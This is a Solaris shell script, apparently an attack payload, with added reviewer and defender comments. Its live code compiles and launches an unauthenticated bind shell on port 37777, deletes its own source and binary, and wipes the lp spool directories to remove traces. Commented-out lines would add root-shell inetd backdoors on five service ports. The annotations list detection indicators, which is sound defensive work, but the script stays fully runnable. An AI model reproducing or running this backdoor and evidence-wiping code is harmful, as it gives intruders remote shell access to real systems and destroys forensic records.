#!/bin/sh

# Pin the command search path to a fixed list of system directories, so that
# cc, cat and rm resolve the same way whatever environment the script was
# started from. /usr/ucb and /usr/xpg4/bin are Solaris locations, matching the
# target named in the comment further down.
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/ucb:/usr/local/bin:/usr/local/sbin\
:/usr/xpg4/bin ; export PATH

# Every file name used below is relative, so shell.c and the compiled binary
# are created in /tmp. The result of cd is not checked: if it fails, the same
# files are written to whatever directory the script was started from.
# Defender note: a short-lived C source file and executable in /tmp, created by
# an account that does not normally build software, is a triage lead.
cd /tmp

# A backdoor on a Solaris ephemeral port. We don't fork, so it dies when you're
# done...
#
# What this section does, as visible in the code:
#   1. writes a small C program to ./shell.c through a here-document,
#   2. compiles it with $CC, linking -lsocket,
#   3. starts it in the background with the port number 37777,
#   4. unlinks both the source and the binary straight away.
#
# Defender notes:
#   - The listener binds INADDR_ANY, so it is reachable on every interface,
#     and it hands /bin/sh to the first client that connects. No
#     authentication or encryption is visible; the shell runs with the
#     privileges of whoever ran this script.
#   - accept() is called once and the process then replaces itself with
#     /bin/sh, so only one session is served. The listening descriptor is
#     never closed, so it stays open in the resulting shell process.
#   - Because the binary is removed while the process is still running, the
#     host shows a process whose executable no longer exists on disk and a TCP
#     listener on 37777 that maps to no configured service. Both are visible
#     with the platform's process and socket inspection tools (for example
#     netstat -an and pfiles on Solaris).
#   - The step needs a working C compiler on the host. A compiler invoked from
#     /tmp is worth alerting on where builds are not expected.

# Compiler selection; the gcc alternative is left commented out.
#CC=gcc
CC=cc

# The here-document delimiter is unquoted, so the shell would expand any $ or
# backquote in the body; the body contains neither and is written as-is.
# The program reads the port from argv[1], listens with a backlog of 1,
# redirects stdin, stdout and stderr to the accepted connection, and execs
# /bin/sh. None of the socket, bind, listen, accept or dup2 return values is
# checked.
cat > shell.c << __EOF__
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

int
main(int argc, char **argv)
{
    int sd, cd;
    unsigned short port;
    struct sockaddr_in saddr;

    if(argc < 2) exit(EXIT_FAILURE);
    port = (unsigned short) strtoul(argv[1], NULL, 0);
    memset(&saddr, 0, sizeof saddr);
    saddr.sin_family = AF_INET;
    saddr.sin_port = htons(port);
    saddr.sin_addr.s_addr = htonl(INADDR_ANY);
    sd = socket(AF_INET, SOCK_STREAM, 0);
    bind(sd, (struct sockaddr *) &saddr, sizeof saddr);
    listen(sd, 1);
    cd = accept(sd, NULL, NULL);
    dup2(cd, STDIN_FILENO);
    dup2(cd, STDOUT_FILENO);
    dup2(cd, STDERR_FILENO);	
    execl("/bin/sh", "sh", (char *) 0);
    exit(0);
}
__EOF__

# Build, launch in the background, then remove the on-disk artefacts. The rm
# runs whether or not the compile succeeded. After it, the evidence of this
# step is the running process and its socket, not a file.
$CC -o shell shell.c -lsocket
./shell 37777 &
rm -f shell.c shell

# Minor cleaning...
#
# Deletes everything under the print spooler's tmp and requests directories.
# NOTE(review): presumably this removes traces left in the lp spool by whatever
# delivered the script; the delivery path is not shown here, so confirm.
# Defender note: request files missing from the spool while the print service
# logs still show submissions is itself an indicator. Off-host log forwarding
# preserves what this step destroys.

rm -rf /var/spool/lp/tmp/*
rm -rf /var/spool/lp/requests/*

# Some inetd backdoors. Uncomment wisely... 
#
# The lines below are disabled. If enabled they would write a temporary inetd
# configuration file named x in the current directory, with five entries that
# each run "/bin/sh sh -i" as root for a named TCP service, start a second
# inetd against that file, and delete the file.
# NOTE(review): -s is presumably inetd's standalone mode; confirm against the
# platform's man page.
# Defender note: the service names resolve through the host's services
# database (conventionally ingreslock 1524, courier 530, ftp-data 20,
# domain 53, printer 515). Indicators are an extra inetd process whose
# argument is not the system configuration file, and root shells spawned by
# inetd on those ports.

#rm -f x
#echo "ingreslock stream tcp nowait root /bin/sh sh -i" >> x 	
#echo "courier stream tcp nowait root /bin/sh sh -i"    >> x
#echo "ftp-data stream tcp nowait root /bin/sh sh -i"   >> x
#echo "domain stream tcp nowait root /bin/sh sh -i"     >> x
#echo "printer stream tcp nowait root /bin/sh sh -i"    >> x
#inetd -s x
#rm -f x 

